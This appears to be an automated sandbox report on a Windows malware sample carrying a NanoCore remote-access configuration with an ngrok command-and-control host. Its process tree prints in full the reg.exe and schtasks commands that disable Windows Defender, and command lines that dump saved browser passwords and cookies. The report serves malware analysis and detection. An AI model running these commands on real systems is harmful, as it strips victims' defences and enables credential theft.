Analysis
-
max time kernel
153s -
max time network
167s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
21-10-2022 15:46
Behavioral task
behavioral1
Sample
2BAD850D4FC1355D5CBDEF48A773968DFD53BAE047865.exe
Resource
win7-20220812-en
General
-
Target
2BAD850D4FC1355D5CBDEF48A773968DFD53BAE047865.exe
-
Size
4.7MB
-
MD5
4efc94d8768163a6e25a53e7d002e962
-
SHA1
35bbd174ee8a9dc8b269b3bcb2ef42f468af6e43
-
SHA256
2bad850d4fc1355d5cbdef48a773968dfd53bae047865fe20b131bcf854eb833
-
SHA512
bafb841aeefc403984cf3236db92ee4a6e4cc0a5b772b7869bf3b604094db39323bb4315cd98a5832ba341023464717ecd9a30e66f62f1dd03ba0031944feb3b
-
SSDEEP
98304:JAB7bQf3s64R9ybzUcwti78OqJ7TPBF3ZlHHgkWJ0P39qXSaDv:u7CzUcwti7TQlF3ZxxWJSUnDv
Malware Config
Extracted
nanocore
1.2.2.0
6.tcp.ngrok.io:16463
5a49404a-bea8-4369-a3bc-4b84d110805c
-
activate_away_mode
true
-
backup_connection_host
6.tcp.ngrok.io
-
backup_dns_server
8.8.4.4
-
buffer_size
65535
-
build_time
2022-06-03T21:54:46.634588736Z
-
bypass_user_account_control
true
- bypass_user_account_control_data
-
clear_access_control
true
-
clear_zone_identifier
false
-
connect_delay
4000
-
connection_port
16463
-
default_group
Default
-
enable_debug_mode
true
-
gc_threshold
1.048576e+07
-
keep_alive_timeout
30000
-
keyboard_logging
false
-
lan_timeout
2500
-
max_packet_size
1.048576e+07
-
mutex
5a49404a-bea8-4369-a3bc-4b84d110805c
-
mutex_timeout
5000
-
prevent_system_sleep
false
-
primary_connection_host
6.tcp.ngrok.io
-
primary_dns_server
8.8.8.8
-
request_elevation
true
-
restart_delay
5000
-
run_delay
0
-
run_on_startup
false
-
set_critical_process
true
-
timeout_interval
5000
-
use_custom_dns_server
false
-
version
1.2.2.0
-
wan_timeout
8000
Signatures
-
Processes:
reg.exereg.exereg.exereg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
NirSoft WebBrowserPassView 8 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\bruh.exe WebBrowserPassView C:\Users\Admin\AppData\Roaming\bruh.exe WebBrowserPassView behavioral2/memory/5096-140-0x00000198658C0000-0x0000019865D3E000-memory.dmp WebBrowserPassView C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe WebBrowserPassView C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe WebBrowserPassView behavioral2/memory/4992-147-0x0000000000A30000-0x0000000000EAA000-memory.dmp WebBrowserPassView C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe WebBrowserPassView C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe WebBrowserPassView -
Nirsoft 13 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\bruh.exe Nirsoft C:\Users\Admin\AppData\Roaming\bruh.exe Nirsoft behavioral2/memory/5096-140-0x00000198658C0000-0x0000019865D3E000-memory.dmp Nirsoft C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe Nirsoft behavioral2/memory/4992-147-0x0000000000A30000-0x0000000000EAA000-memory.dmp Nirsoft C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe Nirsoft behavioral2/memory/3596-207-0x0000000000400000-0x000000000045B000-memory.dmp Nirsoft C:\Users\Admin\AppData\Local\Temp\hh.exe Nirsoft behavioral2/memory/3112-212-0x0000000000400000-0x000000000041B000-memory.dmp Nirsoft C:\Users\Admin\AppData\Local\Temp\xwizard.exe Nirsoft C:\Users\Admin\AppData\Local\Temp\xwizard.exe Nirsoft -
Executes dropped EXE 8 IoCs
Processes:
Windows_Defender.exebruh.exeRtkBtManServ.exesnuvcdsm.exewinhlp32.exesplwow64.exehh.exexwizard.exepid process 4904 Windows_Defender.exe 5096 bruh.exe 4992 RtkBtManServ.exe 1892 snuvcdsm.exe 3596 winhlp32.exe 3112 splwow64.exe 2928 hh.exe 1872 xwizard.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\winhlp32.exe upx C:\Users\Admin\AppData\Local\Temp\winhlp32.exe upx behavioral2/memory/3596-207-0x0000000000400000-0x000000000045B000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\splwow64.exe upx C:\Users\Admin\AppData\Local\Temp\splwow64.exe upx behavioral2/memory/3112-212-0x0000000000400000-0x000000000041B000-memory.dmp upx -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
bruh.exeRtkBtManServ.exeWScript.exeWScript.exeWScript.exe2BAD850D4FC1355D5CBDEF48A773968DFD53BAE047865.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation bruh.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation RtkBtManServ.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Control Panel\International\Geo\Nation 2BAD850D4FC1355D5CBDEF48A773968DFD53BAE047865.exe -
Drops startup file 2 IoCs
Processes:
bruh.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager87595.exe bruh.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Update Manager87595.exe bruh.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Windows_Defender.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\AGP Monitor = "C:\\Program Files (x86)\\AGP Monitor\\agpmon.exe" Windows_Defender.exe -
Processes:
Windows_Defender.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Windows_Defender.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 22 ipecho.net 24 ipecho.net -
Drops file in Program Files directory 2 IoCs
Processes:
Windows_Defender.exedescription ioc process File created C:\Program Files (x86)\AGP Monitor\agpmon.exe Windows_Defender.exe File opened for modification C:\Program Files (x86)\AGP Monitor\agpmon.exe Windows_Defender.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 2 IoCs
Processes:
bruh.exeRtkBtManServ.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings bruh.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings RtkBtManServ.exe -
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
Windows_Defender.exesnuvcdsm.exexwizard.exepid process 4904 Windows_Defender.exe 4904 Windows_Defender.exe 4904 Windows_Defender.exe 1892 snuvcdsm.exe 1892 snuvcdsm.exe 1892 snuvcdsm.exe 1892 snuvcdsm.exe 1872 xwizard.exe 1872 xwizard.exe 1872 xwizard.exe 1872 xwizard.exe 1872 xwizard.exe 1872 xwizard.exe 1872 xwizard.exe 1872 xwizard.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Windows_Defender.exepid process 4904 Windows_Defender.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
Windows_Defender.exeRtkBtManServ.exedescription pid process Token: SeDebugPrivilege 4904 Windows_Defender.exe Token: SeDebugPrivilege 4992 RtkBtManServ.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2BAD850D4FC1355D5CBDEF48A773968DFD53BAE047865.exebruh.execmd.exedescription pid process target process PID 3288 wrote to memory of 4904 3288 2BAD850D4FC1355D5CBDEF48A773968DFD53BAE047865.exe Windows_Defender.exe PID 3288 wrote to memory of 4904 3288 2BAD850D4FC1355D5CBDEF48A773968DFD53BAE047865.exe Windows_Defender.exe PID 3288 wrote to memory of 4904 3288 2BAD850D4FC1355D5CBDEF48A773968DFD53BAE047865.exe Windows_Defender.exe PID 3288 wrote to memory of 5096 3288 2BAD850D4FC1355D5CBDEF48A773968DFD53BAE047865.exe bruh.exe PID 3288 wrote to memory of 5096 3288 2BAD850D4FC1355D5CBDEF48A773968DFD53BAE047865.exe bruh.exe PID 5096 wrote to memory of 4992 5096 bruh.exe RtkBtManServ.exe PID 5096 wrote to memory of 4992 5096 bruh.exe RtkBtManServ.exe PID 5096 wrote to memory of 4992 5096 bruh.exe RtkBtManServ.exe PID 5096 wrote to memory of 1864 5096 bruh.exe cmd.exe PID 5096 wrote to memory of 1864 5096 bruh.exe cmd.exe PID 1864 wrote to memory of 1700 1864 cmd.exe reg.exe PID 1864 wrote to memory of 1700 1864 cmd.exe reg.exe PID 1864 wrote to memory of 5008 1864 cmd.exe reg.exe PID 1864 wrote to memory of 5008 1864 cmd.exe reg.exe PID 1864 wrote to memory of 1796 1864 cmd.exe reg.exe PID 1864 wrote to memory of 1796 1864 cmd.exe reg.exe PID 1864 wrote to memory of 3912 1864 cmd.exe reg.exe PID 1864 wrote to memory of 3912 1864 cmd.exe reg.exe PID 1864 wrote to memory of 4536 1864 cmd.exe reg.exe PID 1864 wrote to memory of 4536 1864 cmd.exe reg.exe PID 1864 wrote to memory of 1288 1864 cmd.exe reg.exe PID 1864 wrote to memory of 1288 1864 cmd.exe reg.exe PID 1864 wrote to memory of 4244 1864 cmd.exe reg.exe PID 1864 wrote to memory of 4244 1864 cmd.exe reg.exe PID 1864 wrote to memory of 4088 1864 cmd.exe reg.exe PID 1864 wrote to memory of 4088 1864 cmd.exe reg.exe PID 1864 wrote to memory of 116 1864 cmd.exe reg.exe PID 1864 wrote to memory of 116 1864 cmd.exe reg.exe PID 1864 wrote to memory of 2392 1864 cmd.exe reg.exe PID 1864 wrote to memory of 2392 1864 cmd.exe reg.exe PID 1864 wrote to memory of 2676 1864 cmd.exe reg.exe PID 1864 wrote to memory of 2676 1864 cmd.exe reg.exe PID 1864 wrote to memory of 3568 1864 cmd.exe reg.exe PID 1864 wrote to memory of 3568 1864 cmd.exe reg.exe PID 1864 wrote to memory of 2876 1864 cmd.exe reg.exe PID 1864 wrote to memory of 2876 1864 cmd.exe reg.exe PID 1864 wrote to memory of 3796 1864 cmd.exe reg.exe PID 1864 wrote to memory of 3796 1864 cmd.exe reg.exe PID 1864 wrote to memory of 3492 1864 cmd.exe reg.exe PID 1864 wrote to memory of 3492 1864 cmd.exe reg.exe PID 1864 wrote to memory of 3552 1864 cmd.exe schtasks.exe PID 1864 wrote to memory of 3552 1864 cmd.exe schtasks.exe PID 1864 wrote to memory of 3452 1864 cmd.exe schtasks.exe PID 1864 wrote to memory of 3452 1864 cmd.exe schtasks.exe PID 1864 wrote to memory of 4636 1864 cmd.exe schtasks.exe PID 1864 wrote to memory of 4636 1864 cmd.exe schtasks.exe PID 1864 wrote to memory of 3980 1864 cmd.exe schtasks.exe PID 1864 wrote to memory of 3980 1864 cmd.exe schtasks.exe PID 1864 wrote to memory of 2356 1864 cmd.exe schtasks.exe PID 1864 wrote to memory of 2356 1864 cmd.exe schtasks.exe PID 1864 wrote to memory of 1496 1864 cmd.exe reg.exe PID 1864 wrote to memory of 1496 1864 cmd.exe reg.exe PID 1864 wrote to memory of 3304 1864 cmd.exe reg.exe PID 1864 wrote to memory of 3304 1864 cmd.exe reg.exe PID 1864 wrote to memory of 4584 1864 cmd.exe reg.exe PID 1864 wrote to memory of 4584 1864 cmd.exe reg.exe PID 1864 wrote to memory of 436 1864 cmd.exe reg.exe PID 1864 wrote to memory of 436 1864 cmd.exe reg.exe PID 1864 wrote to memory of 3916 1864 cmd.exe reg.exe PID 1864 wrote to memory of 3916 1864 cmd.exe reg.exe PID 1864 wrote to memory of 860 1864 cmd.exe reg.exe PID 1864 wrote to memory of 860 1864 cmd.exe reg.exe PID 1864 wrote to memory of 3352 1864 cmd.exe reg.exe PID 1864 wrote to memory of 3352 1864 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2BAD850D4FC1355D5CBDEF48A773968DFD53BAE047865.exe"C:\Users\Admin\AppData\Local\Temp\2BAD850D4FC1355D5CBDEF48A773968DFD53BAE047865.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3288 -
C:\Users\Admin\AppData\Roaming\Windows_Defender.exe"C:\Users\Admin\AppData\Roaming\Windows_Defender.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:4904 -
C:\Users\Admin\AppData\Roaming\bruh.exe"C:\Users\Admin\AppData\Roaming\bruh.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops startup file
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:5096 -
C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe" ZhXl39BlhP84+Y4kurA8wpehxxqA0X22IMYZ6Vpiqs6RfAXVyyPeX7Il3brCopEiQVIzpHB+LCpwgCsluwLNDj4DBZhLa3hT//vTw/zNKTq/g+c2DxMvUoi/FPCks+UNJgcAoTPofVFGmJidCoJN7mpeBiSYL8sFC+cYcJE4Wzo=3⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:4992 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"4⤵
- Checks computer location settings
PID:1492 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat5⤵PID:3908
-
C:\Users\Admin\AppData\Local\Temp\snuvcdsm.exeC:\Users\Admin\AppData\Local\Temp\snuvcdsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_Passwords.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1892 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"4⤵
- Checks computer location settings
PID:4980 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat5⤵PID:2180
-
C:\Users\Admin\AppData\Local\Temp\winhlp32.exeC:\Users\Admin\AppData\Local\Temp\winhlp32.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies1"6⤵
- Executes dropped EXE
PID:3596 -
C:\Users\Admin\AppData\Local\Temp\splwow64.exeC:\Users\Admin\AppData\Local\Temp\splwow64.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies2"6⤵
- Executes dropped EXE
PID:3112 -
C:\Users\Admin\AppData\Local\Temp\hh.exeC:\Users\Admin\AppData\Local\Temp\hh.exe /stext "C:\Users\Admin\AppData\Local\Temp\Cookies3"6⤵
- Executes dropped EXE
PID:2928 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\compile.vbs"4⤵
- Checks computer location settings
PID:3288 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c compile.bat5⤵PID:2708
-
C:\Users\Admin\AppData\Local\Temp\xwizard.exeC:\Users\Admin\AppData\Local\Temp\xwizard.exe /stext "C:\Users\Admin\AppData\Local\Temp\Admin_History.txt"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1872 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\RtkBtManServ.exe"4⤵PID:3052
-
C:\Windows\SysWOW64\choice.exechoice /C Y /N /D Y /T 35⤵PID:1524
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dav.bat"3⤵
- Suspicious use of WriteProcessMemory
PID:1864 -
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f4⤵PID:1700
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f4⤵PID:5008
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f4⤵PID:1796
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f4⤵PID:3912
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:4536 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1288 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:4244 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:4088 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f4⤵
- Modifies Windows Defender Real-time Protection settings
PID:116 -
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f4⤵PID:2392
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f┬┤4⤵PID:2676
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f4⤵PID:3568
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f4⤵PID:2876
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵PID:3796
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f4⤵PID:3492
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable4⤵PID:3552
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable4⤵PID:3452
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable4⤵PID:4636
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable4⤵PID:3980
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable4⤵PID:2356
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f4⤵PID:1496
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f4⤵PID:3304
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f4⤵PID:4584
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f4⤵PID:436
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f4⤵PID:3916
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f4⤵PID:860
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f4⤵PID:3352
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f4⤵PID:5108
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f4⤵PID:3396
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f4⤵
- Modifies security service
PID:448
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
Filesize
4KB
MD530177e1276595fd69ea96b692f49d776
SHA175769c29031ca1ad8e175dd700c74b5e35c5b0c7
SHA25676d4066990e2ee2776f733a25ce23e9af545fd6f1a3b5760d603bdc05d9402d5
SHA512ccdf20174d299de8ec21445faaf4ebe95c04bd7634c9fe138ba54262b754620c2dfd53a5c94b7d53518181d2eab7b5c97d7933d3a66d05220b06aee120893d4b
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
Filesize
4.4MB
MD53405f654559010ca2ae38d786389f0f1
SHA18ac5552c64dfc3ccf0c678f6f946ee23719cf43d
SHA256bc1364d8e68f515f9f35a6b41c11a649b1f514302eb01812c68c9a95a3198b30
SHA512cb1e5ffed2ab86502ea4236383e9a4211a14b1abda13babbcceea67700c5746b37b4da6e45e10196eb76fa1e6959e71f19c6827466a54df1d5ba5ad2e16fc05b
-
Filesize
4.4MB
MD53405f654559010ca2ae38d786389f0f1
SHA18ac5552c64dfc3ccf0c678f6f946ee23719cf43d
SHA256bc1364d8e68f515f9f35a6b41c11a649b1f514302eb01812c68c9a95a3198b30
SHA512cb1e5ffed2ab86502ea4236383e9a4211a14b1abda13babbcceea67700c5746b37b4da6e45e10196eb76fa1e6959e71f19c6827466a54df1d5ba5ad2e16fc05b
-
Filesize
74B
MD5808099bfbd62ec04f0ed44959bbc6160
SHA1f4b6853d958c2c4416f6e4a5be8a11d86f64c023
SHA256f465a1bd2f9a3efcf0589f0b1c234d285f2bebf7416b324271d987a282915ca8
SHA512e4f75253a402f0f5d5c651cde045757dad0d4312be023fabf279d7c053fde6ba63cf387551a0451585a87f929634e0bfa73a06dac85ecd1bb5bc0b72bb98e1f0
-
Filesize
156B
MD5eb51755b637423154d1341c6ee505f50
SHA1d71d27e283b26e75e58c0d02f91d91a2e914c959
SHA256db903aae119dc795581080a528ba04286be11be7e9d417305d77123545fbf0f9
SHA512e23463fe0a3719c2700826b55f375f60e5e67f3e432aa8e90c5afc8f449fc635aa4c031f9b6fa71344a8da9542585b74e4c812383043868a10a1065d477acee5
-
Filesize
71B
MD591128da441ad667b8c54ebeadeca7525
SHA124b5c77fb68db64cba27c338e4373a455111a8cc
SHA25650801c4db374acec11831bf7602cd2635bc8964800c67217b25683dce4a45873
SHA512bd2a8bc4458b1bc85c5a59db872278197bb0a2a2086a1a9aa5b6b876965b9f5586959171f334237588cc6b0f9643f580db2e959f82e451f4a3043a27e4a95cdd
-
Filesize
265B
MD5ca906422a558f4bc9e471709f62ec1a9
SHA1e3da070007fdeae52779964df6f71fcb697ffb06
SHA256abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee
SHA512661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b
-
Filesize
265B
MD5ca906422a558f4bc9e471709f62ec1a9
SHA1e3da070007fdeae52779964df6f71fcb697ffb06
SHA256abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee
SHA512661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b
-
Filesize
265B
MD5ca906422a558f4bc9e471709f62ec1a9
SHA1e3da070007fdeae52779964df6f71fcb697ffb06
SHA256abf09cb96f4c04a1d2d2bfd7184da63dd79c2109b1a768ca5dae4265def39eee
SHA512661d4b4130ba12281527db418f71b7213dab62931806e2bd48690cfaed65b8a2859e5b161eaa4152d5a18babb54d6c2203f4ef5e3a1153c468d67703fd79f66b
-
Filesize
108B
MD51ba367d0f9aac0f650e65ab7401776c0
SHA175cf3295125cfaa0c247ebccc57e63f915198683
SHA25668c4ec552c98f3b5a4744e4eefadd6364dc8075c2e718b7bcbfc76625aa60d03
SHA51245ccdf02314fe01948aa2ecddb3b50f68d5b32d8542e3a3aeaf3f2920e2285d3b75ebb81b9eb9fb9e0a446af5a3708720e07672874d5d38871dbdcd09483449c
-
Filesize
3KB
MD5fc3c88c2080884d6c995d48e172fbc4f
SHA1cb1dcc479ad2533f390786b0480f66296b847ad3
SHA2561637ce704a463bd3c91a38aa02d1030107670f91ee3f0dd4fa13d07a77ba2664
SHA5124807d3bd44a3197d1a9dcf709a1e70e1cf3bf71fe1a9fa1479441b598154c282a620208557a4415a34d23ceb4fd32dda41edbb940b46acb2f00c696648703bf1
-
Filesize
103KB
MD54d4c98eca32b14aeb074db34cd0881e4
SHA192f213d609bba05d41d6941652a88c44936663a4
SHA2564182172a01bdfc08c5cf7e8652f7d9d81858345a770e2b6b507840e4c1c7764f
SHA512959da8bbf6084e802ed366de8d240382b8a5ab2f18bc58881f42ecb7a8ed082d0e078b3ad18dbf90ac0a14cd491b5ac8b00cf1f0a266bdb7ebb8d95c5c71cacf
-
Filesize
391KB
MD5053778713819beab3df309df472787cd
SHA199c7b5827df89b4fafc2b565abed97c58a3c65b8
SHA256f999357a17e672e87fbed66d14ba2bebd6fb04e058a1aae0f0fdc49a797f58fe
SHA51235a00001c718e36e956f49879e453f18f5d6c66bbc6a3e1aad6d5dd1109904539b173c3cad0009bc021d4513a67ae0003282f7d14b7aecaa20e59a22c6ad0ddb
-
Filesize
391KB
MD5053778713819beab3df309df472787cd
SHA199c7b5827df89b4fafc2b565abed97c58a3c65b8
